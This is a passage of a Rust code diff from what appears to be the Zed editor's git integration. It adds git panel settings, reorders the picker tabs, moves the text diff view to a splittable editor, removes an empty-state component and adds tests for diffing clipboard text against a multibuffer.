.flatten()
{
- Some(serialization_key) => cx
- .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) })
+ Some((serialization_key, kvp)) => cx
+ .background_spawn(async move { kvp.read_kvp(&serialization_key) })
.await
.context("loading git panel")
.log_err()
@@ -5738,10 +5815,22 @@ impl Panel for GitPanel {
Some("Git Panel")
}
+ fn icon_label(&self, _: &Window, cx: &App) -> Option<String> {
+ if !GitPanelSettings::get_global(cx).show_count_badge {
+ return None;
+ }
+ let total = self.changes_count;
+ (total > 0).then(|| total.to_string())
+ }
+
fn toggle_action(&self) -> Box<dyn Action> {
Box::new(ToggleFocus)
}
+ fn starts_open(&self, _: &Window, cx: &App) -> bool {
+ GitPanelSettings::get_global(cx).starts_open
+ }
+
fn activation_priority(&self) -> u32 {
2
}
@@ -20,12 +20,16 @@ pub struct GitPanelSettings {
pub dock: DockPosition,
pub default_width: Pixels,
pub status_style: StatusStyle,
+ pub file_icons: bool,
+ pub folder_icons: bool,
pub scrollbar: ScrollbarSettings,
pub fallback_branch_name: String,
pub sort_by_path: bool,
pub collapse_untracked_diff: bool,
pub tree_view: bool,
pub diff_stats: bool,
+ pub show_count_badge: bool,
+ pub starts_open: bool,
}
impl ScrollbarVisibility for GitPanelSettings {
@@ -52,6 +56,8 @@ impl Settings for GitPanelSettings {
dock: git_panel.dock.unwrap().into(),
default_width: px(git_panel.default_width.unwrap()),
status_style: git_panel.status_style.unwrap(),
+ file_icons: git_panel.file_icons.unwrap(),
+ folder_icons: git_panel.folder_icons.unwrap(),
scrollbar: ScrollbarSettings {
show: git_panel.scrollbar.unwrap().show.map(Into::into),
},
@@ -60,6 +66,8 @@ impl Settings for GitPanelSettings {
collapse_untracked_diff: git_panel.collapse_untracked_diff.unwrap(),
tree_view: git_panel.tree_view.unwrap(),
diff_stats: git_panel.diff_stats.unwrap(),
+ show_count_badge: git_panel.show_count_badge.unwrap(),
+ starts_open: git_panel.starts_open.unwrap(),
}
}
}
@@ -25,8 +25,8 @@ actions!(
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
pub enum GitPickerTab {
- Branches,
Worktrees,
+ Branches,
Stash,
}
@@ -190,9 +190,9 @@ impl GitPicker {
fn activate_next_tab(&mut self, window: &mut Window, cx: &mut Context<Self>) {
self.tab = match self.tab {
- GitPickerTab::Branches => GitPickerTab::Worktrees,
- GitPickerTab::Worktrees => GitPickerTab::Stash,
- GitPickerTab::Stash => GitPickerTab::Branches,
+ GitPickerTab::Worktrees => GitPickerTab::Branches,
+ GitPickerTab::Branches => GitPickerTab::Stash,
+ GitPickerTab::Stash => GitPickerTab::Worktrees,
};
self.ensure_active_picker(window, cx);
self.focus_active_picker(window, cx);
@@ -201,9 +201,9 @@ impl GitPicker {
fn activate_previous_tab(&mut self, window: &mut Window, cx: &mut Context<Self>) {
self.tab = match self.tab {
- GitPickerTab::Branches => GitPickerTab::Stash,
- GitPickerTab::Worktrees => GitPickerTab::Branches,
- GitPickerTab::Stash => GitPickerTab::Worktrees,
+ GitPickerTab::Worktrees => GitPickerTab::Stash,
+ GitPickerTab::Branches => GitPickerTab::Worktrees,
+ GitPickerTab::Stash => GitPickerTab::Branches,
};
self.ensure_active_picker(window, cx);
self.focus_active_picker(window, cx);
@@ -241,9 +241,9 @@ impl GitPicker {
"git-picker-tabs",
[
ToggleButtonSimple::new(
- GitPickerTab::Branches.to_string(),
+ GitPickerTab::Worktrees.to_string(),
cx.listener(|this, _, window, cx| {
- this.tab = GitPickerTab::Branches;
+ this.tab = GitPickerTab::Worktrees;
this.ensure_active_picker(window, cx);
this.focus_active_picker(window, cx);
cx.notify();
@@ -251,16 +251,16 @@ impl GitPicker {
)
.tooltip(move |_, cx| {
Tooltip::for_action_in(
- "Toggle Branch Picker",
- &ActivateBranchesTab,
- &branches_focus_handle,
+ "Toggle Worktree Picker",
+ &ActivateWorktreesTab,
+ &worktrees_focus_handle,
cx,
)
}),
ToggleButtonSimple::new(
- GitPickerTab::Worktrees.to_string(),
+ GitPickerTab::Branches.to_string(),
cx.listener(|this, _, window, cx| {
- this.tab = GitPickerTab::Worktrees;
+ this.tab = GitPickerTab::Branches;
this.ensure_active_picker(window, cx);
this.focus_active_picker(window, cx);
cx.notify();
@@ -268,9 +268,9 @@ impl GitPicker {
)
.tooltip(move |_, cx| {
Tooltip::for_action_in(
- "Toggle Worktree Picker",
- &ActivateWorktreesTab,
- &worktrees_focus_handle,
+ "Toggle Branch Picker",
+ &ActivateBranchesTab,
+ &branches_focus_handle,
cx,
)
}),
@@ -297,8 +297,8 @@ impl GitPicker {
.style(ToggleButtonGroupStyle::Outlined)
.auto_width()
.selected_index(match self.tab {
- GitPickerTab::Branches => 0,
- GitPickerTab::Worktrees => 1,
+ GitPickerTab::Worktrees => 0,
+ GitPickerTab::Branches => 1,
GitPickerTab::Stash => 2,
}),
)
@@ -62,6 +62,7 @@ pub fn init(cx: &mut App) {
git_panel::register(workspace);
repository_selector::register(workspace);
git_picker::register(workspace);
+ conflict_view::register_conflict_notification(workspace, cx);
let project = workspace.project().read(cx);
if project.is_read_only(cx) {
@@ -294,11 +295,12 @@ pub fn resolve_active_repository(workspace: &Workspace, cx: &App) -> Option<Enti
git_store
.repositories()
.values()
- .find(|repo| {
+ .filter(|repo| {
let repo_path = &repo.read(cx).work_directory_abs_path;
*repo_path == worktree_abs_path
|| worktree_abs_path.starts_with(repo_path.as_ref())
})
+ .max_by_key(|repo| repo.read(cx).work_directory_abs_path.as_os_str().len())
.cloned()
})
})
@@ -871,8 +873,7 @@ impl Render for GitCloneModal {
.child(
Button::new("learn-more", "Learn More")
.label_size(LabelSize::Small)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::XSmall)
+ .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::XSmall))
.on_click(|_, _, cx| {
cx.open_url("https://github.com/git-guides/git-clone");
}),
@@ -3,9 +3,9 @@ use buffer_diff::BufferDiff;
use editor::{Editor, EditorEvent, MultiBuffer, multibuffer_context_lines};
use gpui::{
AnyElement, App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, FocusHandle,
- Focusable, IntoElement, Render, SharedString, Task, Window,
+ Focusable, Font, IntoElement, Render, SharedString, Task, Window,
};
-use language::{Buffer, Capability, OffsetRangeExt};
+use language::{Buffer, Capability, HighlightedText, OffsetRangeExt};
use multi_buffer::PathKey;
use project::Project;
use std::{
@@ -18,7 +18,7 @@ use util::paths::PathStyle;
use util::rel_path::RelPath;
use workspace::{
Item, ItemHandle as _, ItemNavHistory, ToolbarItemLocation, Workspace,
- item::{BreadcrumbText, ItemEvent, SaveOptions, TabContentParams},
+ item::{ItemEvent, SaveOptions, TabContentParams},
searchable::SearchableItemHandle,
};
@@ -338,7 +338,7 @@ impl Item for MultiDiffView {
ToolbarItemLocation::PrimaryLeft
}
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>> {
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
self.editor.breadcrumbs(cx)
}
@@ -2,7 +2,6 @@ use crate::{
conflict_view::ConflictAddon,
git_panel::{GitPanel, GitPanelAddon, GitStatusEntry},
git_panel_settings::GitPanelSettings,
- remote_button::{render_publish_button, render_push_button},
resolve_active_repository,
};
use agent_settings::AgentSettings;
@@ -18,8 +17,7 @@ use editor::{
use git::repository::DiffType;
use git::{
- Commit, StageAll, StageAndNext, ToggleStaged, UnstageAll, UnstageAndNext,
- repository::{Branch, RepoPath, Upstream, UpstreamTracking, UpstreamTrackingStatus},
+ Commit, StageAll, StageAndNext, ToggleStaged, UnstageAll, UnstageAndNext, repository::RepoPath,
status::FileStatus,
};
use gpui::{
@@ -1221,8 +1219,9 @@ impl SerializableItem for ProjectDiff {
window: &mut Window,
cx: &mut App,
) -> Task<Result<Entity<Self>>> {
+ let db = persistence::ProjectDiffDb::global(cx);
window.spawn(cx, async move |cx| {
- let diff_base = persistence::PROJECT_DIFF_DB.get_diff_base(item_id, workspace_id)?;
+ let diff_base = db.get_diff_base(item_id, workspace_id)?;
let diff = cx.update(|window, cx| {
let branch_diff = cx
@@ -1248,10 +1247,10 @@ impl SerializableItem for ProjectDiff {
let workspace_id = workspace.database_id()?;
let diff_base = self.diff_base(cx).clone();
+ let db = persistence::ProjectDiffDb::global(cx);
Some(cx.background_spawn({
async move {
- persistence::PROJECT_DIFF_DB
- .save_diff_base(item_id, workspace_id, diff_base.clone())
+ db.save_diff_base(item_id, workspace_id, diff_base.clone())
.await
}
}))
@@ -1291,7 +1290,7 @@ mod persistence {
)];
}
- db::static_connection!(PROJECT_DIFF_DB, ProjectDiffDb, [WorkspaceDb]);
+ db::static_connection!(ProjectDiffDb, [WorkspaceDb]);
impl ProjectDiffDb {
pub async fn save_diff_base(
@@ -1594,8 +1593,11 @@ fn render_send_review_to_agent_button(review_count: usize, focus_handle: &FocusH
"send-review",
format!("Send Review to Agent ({})", review_count),
)
- .icon(IconName::ZedAssistant)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::ZedAssistant)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.tooltip(Tooltip::for_action_title_in(
"Send all review comments to the Agent panel",
&SendReviewToAgent,
@@ -1688,10 +1690,11 @@ impl Render for BranchDiffToolbar {
let focus_handle = focus_handle.clone();
this.child(Divider::vertical()).child(
Button::new("review-diff", "Review Diff")
- .icon(IconName::ZedAssistant)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::ZedAssistant)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.key_binding(KeyBinding::for_action_in(&ReviewDiff, &focus_handle, cx))
.tooltip(move |_, cx| {
Tooltip::with_meta_in(
@@ -1719,254 +1722,6 @@ impl Render for BranchDiffToolbar {
}
}
-#[derive(IntoElement, RegisterComponent)]
-pub struct ProjectDiffEmptyState {
- pub no_repo: bool,
- pub can_push_and_pull: bool,
- pub focus_handle: Option<FocusHandle>,
- pub current_branch: Option<Branch>,
- // has_pending_commits: bool,
- // ahead_of_remote: bool,
- // no_git_repository: bool,
-}
-
-impl RenderOnce for ProjectDiffEmptyState {
- fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement {
- let status_against_remote = |ahead_by: usize, behind_by: usize| -> bool {
- matches!(self.current_branch, Some(Branch {
- upstream:
- Some(Upstream {
- tracking:
- UpstreamTracking::Tracked(UpstreamTrackingStatus {
- ahead, behind, ..
- }),
- ..
- }),
- ..
- }) if (ahead > 0) == (ahead_by > 0) && (behind > 0) == (behind_by > 0))
- };
-
- let change_count = |current_branch: &Branch| -> (usize, usize) {
- match current_branch {
- Branch {
- upstream:
- Some(Upstream {
- tracking:
- UpstreamTracking::Tracked(UpstreamTrackingStatus {
- ahead, behind, ..
- }),
- ..
- }),
- ..
- } => (*ahead as usize, *behind as usize),
- _ => (0, 0),
- }
- };
-
- let not_ahead_or_behind = status_against_remote(0, 0);
- let ahead_of_remote = status_against_remote(1, 0);
- let branch_not_on_remote = if let Some(branch) = self.current_branch.as_ref() {
- branch.upstream.is_none()
- } else {
- false
- };
-
- let has_branch_container = |branch: &Branch| {
- h_flex()
- .max_w(px(420.))
- .bg(cx.theme().colors().text.opacity(0.05))
- .border_1()
- .border_color(cx.theme().colors().border)
- .rounded_sm()
- .gap_8()
- .px_6()
- .py_4()
- .map(|this| {
- if ahead_of_remote {
- let ahead_count = change_count(branch).0;
- let ahead_string = format!("{} Commits Ahead", ahead_count);
- this.child(
- v_flex()
- .child(Headline::new(ahead_string).size(HeadlineSize::Small))
- .child(
- Label::new(format!("Push your changes to {}", branch.name()))
- .color(Color::Muted),
- ),
- )
- .child(div().child(render_push_button(
- self.focus_handle,
- "push".into(),
- ahead_count as u32,
- )))
- } else if branch_not_on_remote {
- this.child(
- v_flex()
- .child(Headline::new("Publish Branch").size(HeadlineSize::Small))
- .child(
- Label::new(format!("Create {} on remote", branch.name()))
- .color(Color::Muted),
- ),
- )
- .child(
- div().child(render_publish_button(self.focus_handle, "publish".into())),
- )
- } else {
- this.child(Label::new("Remote status unknown").color(Color::Muted))
- }
- })
- };
-
- v_flex().size_full().items_center().justify_center().child(
- v_flex()
- .gap_1()
- .when(self.no_repo, |this| {
- this.text_center()
- .child(Label::new("No Repository").color(Color::Muted))
- .child(
- Button::new("initialize-repo", "Initialize Repository")
- .on_click(move |_, _, cx| cx.dispatch_action(&git::Init)),
- )
- })
- .map(|this| {
- if not_ahead_or_behind && self.current_branch.is_some() {
- this.text_center()
- .child(Label::new("No Changes").color(Color::Muted))
- } else {
- this.when_some(self.current_branch.as_ref(), |this, branch| {
- this.child(has_branch_container(branch))
- })
- }
- }),
- )
- }
-}
-
-mod preview {
- use git::repository::{
- Branch, CommitSummary, Upstream, UpstreamTracking, UpstreamTrackingStatus,
- };
- use ui::prelude::*;
-
- use super::ProjectDiffEmptyState;
-
- // View this component preview using `workspace: open component-preview`
- impl Component for ProjectDiffEmptyState {
- fn scope() -> ComponentScope {
- ComponentScope::VersionControl
- }
-
- fn preview(_window: &mut Window, _cx: &mut App) -> Option<AnyElement> {
- let unknown_upstream: Option<UpstreamTracking> = None;
- let ahead_of_upstream: Option<UpstreamTracking> = Some(
- UpstreamTrackingStatus {
- ahead: 2,
- behind: 0,
- }
- .into(),
- );
-
- let not_ahead_or_behind_upstream: Option<UpstreamTracking> = Some(
- UpstreamTrackingStatus {
- ahead: 0,
- behind: 0,
- }
- .into(),
- );
-
- fn branch(upstream: Option<UpstreamTracking>) -> Branch {
- Branch {
- is_head: true,
- ref_name: "some-branch".into(),
- upstream: upstream.map(|tracking| Upstream {
- ref_name: "origin/some-branch".into(),
- tracking,
- }),
- most_recent_commit: Some(CommitSummary {
- sha: "abc123".into(),
- subject: "Modify stuff".into(),
- commit_timestamp: 1710932954,
- author_name: "John Doe".into(),
- has_parent: true,
- }),
- }
- }
-
- let no_repo_state = ProjectDiffEmptyState {
- no_repo: true,
- can_push_and_pull: false,
- focus_handle: None,
- current_branch: None,
- };
-
- let no_changes_state = ProjectDiffEmptyState {
- no_repo: false,
- can_push_and_pull: true,
- focus_handle: None,
- current_branch: Some(branch(not_ahead_or_behind_upstream)),
- };
-
- let ahead_of_upstream_state = ProjectDiffEmptyState {
- no_repo: false,
- can_push_and_pull: true,
- focus_handle: None,
- current_branch: Some(branch(ahead_of_upstream)),
- };
-
- let unknown_upstream_state = ProjectDiffEmptyState {
- no_repo: false,
- can_push_and_pull: true,
- focus_handle: None,
- current_branch: Some(branch(unknown_upstream)),
- };
-
- let (width, height) = (px(480.), px(320.));
-
- Some(
- v_flex()
- .gap_6()
- .children(vec![
- example_group(vec![
- single_example(
- "No Repo",
- div()
- .w(width)
- .h(height)
- .child(no_repo_state)
- .into_any_element(),
- ),
- single_example(
- "No Changes",
- div()
- .w(width)
- .h(height)
- .child(no_changes_state)
- .into_any_element(),
- ),
- single_example(
- "Unknown Upstream",
- div()
- .w(width)
- .h(height)
- .child(unknown_upstream_state)
- .into_any_element(),
- ),
- single_example(
- "Ahead of Remote",
- div()
- .w(width)
- .h(height)
- .child(ahead_of_upstream_state)
- .into_any_element(),
- ),
- ])
- .vertical(),
- ])
- .into_any_element(),
- )
- }
- }
-}
-
struct BranchDiffAddon {
branch_diff: Entity<branch_diff::BranchDiff>,
}
@@ -2,7 +2,10 @@
use anyhow::Result;
use buffer_diff::BufferDiff;
-use editor::{Editor, EditorEvent, MultiBuffer, ToPoint, actions::DiffClipboardWithSelectionData};
+use editor::{
+ Editor, EditorEvent, EditorSettings, MultiBuffer, SplittableEditor, ToPoint,
+ actions::DiffClipboardWithSelectionData,
+};
use futures::{FutureExt, select_biased};
use gpui::{
AnyElement, App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, FocusHandle,
@@ -10,6 +13,7 @@ use gpui::{
};
use language::{self, Buffer, Point};
use project::Project;
+use settings::Settings;
use std::{
any::{Any, TypeId},
cmp,
@@ -22,13 +26,13 @@ use ui::{Color, Icon, IconName, Label, LabelCommon as _, SharedString};
use util::paths::PathExt;
use workspace::{
- Item, ItemHandle as _, ItemNavHistory, Workspace,
+ Item, ItemNavHistory, Workspace,
item::{ItemEvent, SaveOptions, TabContentParams},
searchable::SearchableItemHandle,
};
pub struct TextDiffView {
- diff_editor: Entity<Editor>,
+ diff_editor: Entity<SplittableEditor>,
title: SharedString,
path: Option<SharedString>,
buffer_changes_tx: watch::Sender<()>,
@@ -47,11 +51,24 @@ impl TextDiffView {
let source_editor = diff_data.editor.clone();
let selection_data = source_editor.update(cx, |editor, cx| {
- let multibuffer = editor.buffer().read(cx);
- let source_buffer = multibuffer.as_singleton()?;
+ let multibuffer = editor.buffer();
let selections = editor.selections.all::<Point>(&editor.display_snapshot(cx));
- let buffer_snapshot = source_buffer.read(cx);
let first_selection = selections.first()?;
+
+ let (source_buffer, buffer_start, start_excerpt) = multibuffer
+ .read(cx)
+ .point_to_buffer_point(first_selection.start, cx)?;
+ let buffer_end = multibuffer
+ .read(cx)
+ .point_to_buffer_point(first_selection.end, cx)
+ .and_then(|(buf, pt, end_excerpt)| {
+ (buf.read(cx).remote_id() == source_buffer.read(cx).remote_id()
+ && end_excerpt == start_excerpt)
+ .then_some(pt)
+ })
+ .unwrap_or(buffer_start);
+
+ let buffer_snapshot = source_buffer.read(cx);
let max_point = buffer_snapshot.max_point();
if first_selection.is_empty() {
@@ -59,15 +76,12 @@ impl TextDiffView {
return Some((source_buffer, full_range));
}
- let start = first_selection.start;
- let end = first_selection.end;
- let expanded_start = Point::new(start.row, 0);
-
- let expanded_end = if end.column > 0 {
- let next_row = end.row + 1;
+ let expanded_start = Point::new(buffer_start.row, 0);
+ let expanded_end = if buffer_end.column > 0 {
+ let next_row = buffer_end.row + 1;
cmp::min(max_point, Point::new(next_row, 0))
} else {
- end
+ buffer_end
};
Some((source_buffer, expanded_start..expanded_end))
});
@@ -78,11 +92,24 @@ impl TextDiffView {
};
source_editor.update(cx, |source_editor, cx| {
- source_editor.change_selections(Default::default(), window, cx, |s| {
- s.select_ranges(vec![
- expanded_selection_range.start..expanded_selection_range.end,
- ]);
- })
+ let multibuffer = source_editor.buffer();
+ let mb_range = {
+ let mb = multibuffer.read(cx);
+ let start_anchor =
+ mb.buffer_point_to_anchor(&source_buffer, expanded_selection_range.start, cx);
+ let end_anchor =
+ mb.buffer_point_to_anchor(&source_buffer, expanded_selection_range.end, cx);
+ start_anchor.zip(end_anchor).map(|(s, e)| {
+ let snapshot = mb.snapshot(cx);
+ s.to_point(&snapshot)..e.to_point(&snapshot)
+ })
+ };
+
+ if let Some(range) = mb_range {
+ source_editor.change_selections(Default::default(), window, cx, |s| {
+ s.select_ranges(vec![range]);
+ });
+ }
});
let source_buffer_snapshot = source_buffer.read(cx).snapshot();
@@ -102,11 +129,11 @@ impl TextDiffView {
);
let task = window.spawn(cx, async move |cx| {
- let project = workspace.update(cx, |workspace, _| workspace.project().clone())?;
-
update_diff_buffer(&diff_buffer, &source_buffer, &clipboard_buffer, cx).await?;
workspace.update_in(cx, |workspace, window, cx| {
+ let project = workspace.project().clone();
+ let workspace_entity = cx.entity();
let diff_view = cx.new(|cx| {
TextDiffView::new(
clipboard_buffer,
@@ -115,6 +142,7 @@ impl TextDiffView {
expanded_selection_range,
diff_buffer,
project,
+ workspace_entity,
window,
cx,
)
@@ -139,6 +167,7 @@ impl TextDiffView {
source_range: Range<Point>,
diff_buffer: Entity<BufferDiff>,
project: Entity<Project>,
+ workspace: Entity<Workspace>,
window: &mut Window,
cx: &mut Context<Self>,
) -> Self {
@@ -151,21 +180,30 @@ impl TextDiffView {
multibuffer
});
let diff_editor = cx.new(|cx| {
- let mut editor = Editor::for_multibuffer(multibuffer, Some(project), window, cx);
- editor.start_temporary_diff_override();
- editor.disable_diagnostics(cx);
- editor.set_expand_all_diff_hunks(cx);
- editor.set_render_diff_hunk_controls(
+ let splittable = SplittableEditor::new(
+ EditorSettings::get_global(cx).diff_view_style,
+ multibuffer,
+ project,
+ workspace,
+ window,
+ cx,
+ );
+ splittable.set_render_diff_hunk_controls(
Arc::new(|_, _, _, _, _, _, _, _| gpui::Empty.into_any_element()),
cx,
);
- editor
+ splittable.rhs_editor().update(cx, |editor, cx| {
+ editor.start_temporary_diff_override();
+ editor.disable_diagnostics(cx);
+ editor.set_expand_all_diff_hunks(cx);
+ });
+ splittable
});
let (buffer_changes_tx, mut buffer_changes_rx) = watch::channel(());
cx.subscribe(&source_buffer, move |this, _, event, _| match event {
- language::BufferEvent::Edited
+ language::BufferEvent::Edited { .. }
| language::BufferEvent::LanguageChanged(_)
| language::BufferEvent::Reparsed => {
this.buffer_changes_tx.send(()).ok();
@@ -329,12 +367,14 @@ impl Item for TextDiffView {
&'a self,
type_id: TypeId,
self_handle: &'a Entity<Self>,
- _: &'a App,
+ cx: &'a App,
) -> Option<gpui::AnyEntity> {
if type_id == TypeId::of::<Self>() {
Some(self_handle.clone().into())
- } else if type_id == TypeId::of::<Editor>() {
+ } else if type_id == TypeId::of::<SplittableEditor>() {
Some(self.diff_editor.clone().into())
+ } else if type_id == TypeId::of::<Editor>() {
+ Some(self.diff_editor.read(cx).rhs_editor().clone().into())
} else {
None
}
@@ -349,7 +389,7 @@ impl Item for TextDiffView {
cx: &App,
f: &mut dyn FnMut(gpui::EntityId, &dyn project::ProjectItem),
) {
- self.diff_editor.for_each_project_item(cx, f)
+ self.diff_editor.read(cx).for_each_project_item(cx, f)
}
fn set_nav_history(
@@ -358,7 +398,8 @@ impl Item for TextDiffView {
_: &mut Window,
cx: &mut Context<Self>,
) {
- self.diff_editor.update(cx, |editor, _| {
+ let rhs = self.diff_editor.read(cx).rhs_editor().clone();
+ rhs.update(cx, |editor, _| {
editor.set_nav_history(Some(nav_history));
});
}
@@ -439,11 +480,12 @@ impl Render for TextDiffView {
#[cfg(test)]
mod tests {
use super::*;
- use editor::{MultiBufferOffset, test::editor_test_context::assert_state_with_diff};
- use gpui::{TestAppContext, VisualContext};
+ use editor::{MultiBufferOffset, PathKey, test::editor_test_context::assert_state_with_diff};
+ use gpui::{BorrowAppContext, TestAppContext, VisualContext};
+ use language::Point;
use project::{FakeFs, Project};
use serde_json::json;
- use settings::SettingsStore;
+ use settings::{DiffViewStyle, SettingsStore};
use unindent::unindent;
use util::{path, test::marked_text_ranges};
use workspace::MultiWorkspace;
@@ -452,6 +494,11 @@ mod tests {
cx.update(|cx| {
let settings_store = SettingsStore::test(cx);
cx.set_global(settings_store);
+ cx.update_global::<SettingsStore, _>(|store, cx| {
+ store.update_user_settings(cx, |settings| {
+ settings.editor.diff_view_style = Some(DiffViewStyle::Unified);
+ });
+ });
theme::init(theme::LoadThemes::JustBase, cx);
});
}
@@ -643,6 +690,185 @@ mod tests {
.await;
}
+ #[gpui::test]
+ async fn test_diffing_clipboard_from_multibuffer_with_selection(cx: &mut TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/project"),
+ json!({
+ "a.txt": "alpha\nbeta\ngamma",
+ "b.txt": "one\ntwo\nthree"
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs, [path!("/project").as_ref()], cx).await;
+
+ let buffer_a = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/project/a.txt"), cx)
+ })
+ .await
+ .unwrap();
+ let buffer_b = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/project/b.txt"), cx)
+ })
+ .await
+ .unwrap();
+
+ let (multi_workspace, cx) =
+ cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+
+ let editor = cx.new_window_entity(|window, cx| {
+ let multibuffer = cx.new(|cx| {
+ let mut mb = MultiBuffer::new(language::Capability::ReadWrite);
+ mb.set_excerpts_for_path(
+ PathKey::sorted(0),
+ buffer_a.clone(),
+ [Point::new(0, 0)..Point::new(2, 5)],
+ 0,
+ cx,
+ );
+ mb.set_excerpts_for_path(
+ PathKey::sorted(1),
+ buffer_b.clone(),
+ [Point::new(0, 0)..Point::new(2, 5)],
+ 0,
+ cx,
+ );
+ mb
+ });
+
+ let mut editor =
+ Editor::for_multibuffer(multibuffer, Some(project.clone()), window, cx);
+ // Select "beta" inside the first excerpt
+ editor.change_selections(Default::default(), window, cx, |s| {
+ s.select_ranges([MultiBufferOffset(6)..MultiBufferOffset(10)]);
+ });
+ editor
+ });
+
+ let diff_view = workspace
+ .update_in(cx, |workspace, window, cx| {
+ TextDiffView::open(
+ &DiffClipboardWithSelectionData {
+ clipboard_text: "REPLACED".to_string(),
+ editor,
+ },
+ workspace,
+ window,
+ cx,
+ )
+ })
+ .unwrap()
+ .await
+ .unwrap();
+
+ cx.executor().run_until_parked();
+
+ diff_view.read_with(cx, |diff_view, _cx| {
+ assert!(
+ diff_view.title.contains("Clipboard"),
+ "diff view should have opened with a clipboard diff title, got: {}",
+ diff_view.title
+ );
+ });
+ }
+
+ #[gpui::test]
+ async fn test_diffing_clipboard_from_multibuffer_with_empty_selection(cx: &mut TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/project"),
+ json!({
+ "a.txt": "alpha\nbeta\ngamma",
+ "b.txt": "one\ntwo\nthree"
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs, [path!("/project").as_ref()], cx).await;
+
+ let buffer_a = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/project/a.txt"), cx)
+ })
+ .await
+ .unwrap();
+ let buffer_b = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/project/b.txt"), cx)
+ })
+ .await
+ .unwrap();
+
+ let (multi_workspace, cx) =
+ cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+
+ let editor = cx.new_window_entity(|window, cx| {
+ let multibuffer = cx.new(|cx| {
+ let mut mb = MultiBuffer::new(language::Capability::ReadWrite);
+ mb.set_excerpts_for_path(
+ PathKey::sorted(0),
+ buffer_a.clone(),
+ [Point::new(0, 0)..Point::new(2, 5)],
+ 0,
+ cx,
+ );
+ mb.set_excerpts_for_path(
+ PathKey::sorted(1),
+ buffer_b.clone(),
+ [Point::new(0, 0)..Point::new(2, 5)],
+ 0,
+ cx,
+ );
+ mb
+ });
+
+ let mut editor =
+ Editor::for_multibuffer(multibuffer, Some(project.clone()), window, cx);
+ // Cursor inside the first excerpt (no selection)
+ editor.change_selections(Default::default(), window, cx, |s| {
+ s.select_ranges([MultiBufferOffset(6)..MultiBufferOffset(6)]);
+ });
+ editor
+ });
+
+ let diff_view = workspace
+ .update_in(cx, |workspace, window, cx| {
+ TextDiffView::open(
+ &DiffClipboardWithSelectionData {
+ clipboard_text: "REPLACED".to_string(),
+ editor,
+ },
+ workspace,
+ window,
+ cx,
+ )
+ })
+ .unwrap()
+ .await
+ .unwrap();
+
+ cx.executor().run_until_parked();
+
+ // Empty selection should diff the full underlying buffer
+ diff_view.read_with(cx, |diff_view, _cx| {
+ assert!(
+ diff_view.title.contains("Clipboard"),
+ "diff view should have opened with a clipboard diff title, got: {}",
+ diff_view.title
+ );
+ });
+ }
+
async fn base_test(
project_root: &str,
file_path: &str,
@@ -715,7 +941,9 @@ mod tests {
cx.executor().run_until_parked();
assert_state_with_diff(
- &diff_view.read_with(cx, |diff_view, _| diff_view.diff_editor.clone()),
+ &diff_view.read_with(cx, |diff_view, cx| {
+ diff_view.diff_editor.read(cx).rhs_editor().clone()
+ }),
cx,
expected_diff,
);
@@ -2,7 +2,7 @@ use anyhow::Context as _;
use collections::HashSet;
use fuzzy::StringMatchCandidate;
-use git::repository::{Worktree as GitWorktree, validate_worktree_directory};
+use git::repository::Worktree as GitWorktree;
use gpui::{
Action, App, AsyncWindowContext, Context, DismissEvent, Entity, EventEmitter, FocusHandle,
Focusable, InteractiveElement, IntoElement, Modifiers, ModifiersChangedEvent, ParentElement,
@@ -96,9 +96,12 @@ impl WorktreeList {
});
cx.spawn_in(window, async move |this, cx| {
- let all_worktrees = all_worktrees_request
+ let all_worktrees: Vec<_> = all_worktrees_request
.context("No active repository")?
- .await??;
+ .await??
+ .into_iter()
+ .filter(|worktree| worktree.ref_name.is_some()) // hide worktrees without a branch
+ .collect();
let default_branch = default_branch_request
.context("No active repository")?
@@ -182,7 +185,7 @@ impl WorktreeList {
return;
}
picker.delegate.create_worktree(
- entry.worktree.branch(),
+ entry.worktree.display_name(),
replace_current_window,
Some(default_branch.into()),
window,
@@ -300,11 +303,10 @@ impl WorktreeListDelegate {
.git
.worktree_directory
.clone();
- let original_repo = repo.original_repo_abs_path.clone();
- let directory =
- validate_worktree_directory(&original_repo, &worktree_directory_setting)?;
- let new_worktree_path = directory.join(&branch);
- let receiver = repo.create_worktree(branch.clone(), directory, commit);
+ let new_worktree_path =
+ repo.path_for_new_linked_worktree(&branch, &worktree_directory_setting)?;
+ let receiver =
+ repo.create_worktree(branch.clone(), new_worktree_path.clone(), commit);
anyhow::Ok((receiver, new_worktree_path))
})?;
receiver.await??;
@@ -650,7 +652,7 @@ impl PickerDelegate for WorktreeListDelegate {
let candidates = all_worktrees
.iter()
.enumerate()
- .map(|(ix, worktree)| StringMatchCandidate::new(ix, worktree.branch()))
+ .map(|(ix, worktree)| StringMatchCandidate::new(ix, worktree.display_name()))
.collect::<Vec<StringMatchCandidate>>();
fuzzy::match_strings(
&candidates,
@@ -675,13 +677,13 @@ impl PickerDelegate for WorktreeListDelegate {
if !query.is_empty()
